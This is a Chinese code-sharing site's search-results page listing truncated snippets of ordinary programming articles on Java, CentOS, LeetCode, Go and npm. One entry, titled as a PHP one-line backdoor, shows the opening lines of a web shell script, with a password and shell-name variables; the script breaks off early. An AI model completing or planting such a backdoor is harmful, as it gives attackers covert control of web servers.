码迷,mamicode.com
首页 >  
搜索关键字:pragma pack    ( 9663个结果
00003-aspose for java 生成水印刻章等,可转为word,pic,pdf
对应java代码:packagecom.yoooya.ytp.utils.doc;importcom.aspose.words.Document;importcom.aspose.words.License;importcom.aspose.words.SaveFormat;importcom.yoooya.ytp.utils.DateUtils;importcom.yoooya.ytp.util
分类:编程语言   时间:2020-05-16 10:46:26    阅读次数:66
CentOS 8.1 配置vsftp和yum
使用vsftp配置本地yum源 1、安装vsftp 使用vmware安装好CentOS 8.1 后,开机会自动挂载,此时进入挂载目录下的 AppStream/Packages 下,执行以下命令安装vsftp 修改配置文件 /etc/vsftpd/vsftpd.conf 的 为 否则下面的配置yum会 ...
分类:其他好文   时间:2020-05-16 00:26:33    阅读次数:169
LeetCode 面试题64. 求1+2+…+n
我的LeetCode:https://leetcode cn.com/u/ituring/ 我的LeetCode刷题源码[GitHub]:https://github.com/izhoujie/Algorithmcii LeetCode 面试题64. 求1+2+…+n 题目 求 1+2+...+n ...
分类:其他好文   时间:2020-05-16 00:12:43    阅读次数:76
[20-05-15][Thinking in Java 17]Java Inner Class 1 - Inner Class 2
1 package test_13_2; 2 3 public class Outer { 4 5 private String str; 6 7 public Outer() { 8 9 } 10 11 public Outer(String str) { 12 13 this.str = str ...
分类:编程语言   时间:2020-05-15 22:56:38    阅读次数:82
VC++.单例1比较进程路径
``` // ?.h : 头文件 #pragma once #include #include #include // ?.cpp //#include CString DosPathToNt(IN TCHAR *szDosPath) { CString ret; try { TCHAR szDri... ...
分类:编程语言   时间:2020-05-15 19:52:27    阅读次数:74
ssm项目整合流程及基本配置文件
配置数据库环境,创建数据库和表 创建maven空项目,并添加web组件支持 导入pom依赖 <dependencies> <!--Junit--> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <versio ...
分类:其他好文   时间:2020-05-15 15:54:56    阅读次数:87
[原创]-在Idea中使用Alibaba Cloud Toolkit将SpringBoot项目部署到ECS服务器
在 Idea 安装 Alibaba Cloud Toolkit 插件 步骤: Prefererences Plugins Marketplace 搜索Alibaba Cloud Toolkit Install Restart Idea 创建简单项目 使用 Idea 创建 SpringBoot 项目: ...
分类:编程语言   时间:2020-05-15 15:26:29    阅读次数:160
evalPHP一句话后门
evalPHP一句话后门 <?php $password='c2.o'; $shellname='BY:FBI'; $myurl='http://www.baidu.com'; error_reporting(E_ERROR | E_PARSE);@set_time_limit(0); ob_sta ...
分类:Web程序   时间:2020-05-15 13:23:16    阅读次数:242
Golang封装Elasticsearch常用功能
前言(为什么要写这篇文章) 首先看过我博客的都应该知道,我去年发了一篇Python封装Elasticsearch的文章。但那是去年了,今年我将我的检索服务后端用Golang全部重写了一波,相当于用Go重构了以前的Python代码,不过我个人感觉Golang的效率还是高于Python的,而且我还加了一 ...
分类:其他好文   时间:2020-05-14 13:50:31    阅读次数:74
yapi安装
npm install g yapi cli registry https://registry.npm.taobao.org $ sudo npm install g yapi cli registry https://registry.npm.taobao.org /usr/local/bin/ ...
分类:Windows程序   时间:2020-05-14 13:40:32    阅读次数:99
9663条   上一页 1 ... 62 63 64 65 66 ... 967 下一页
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!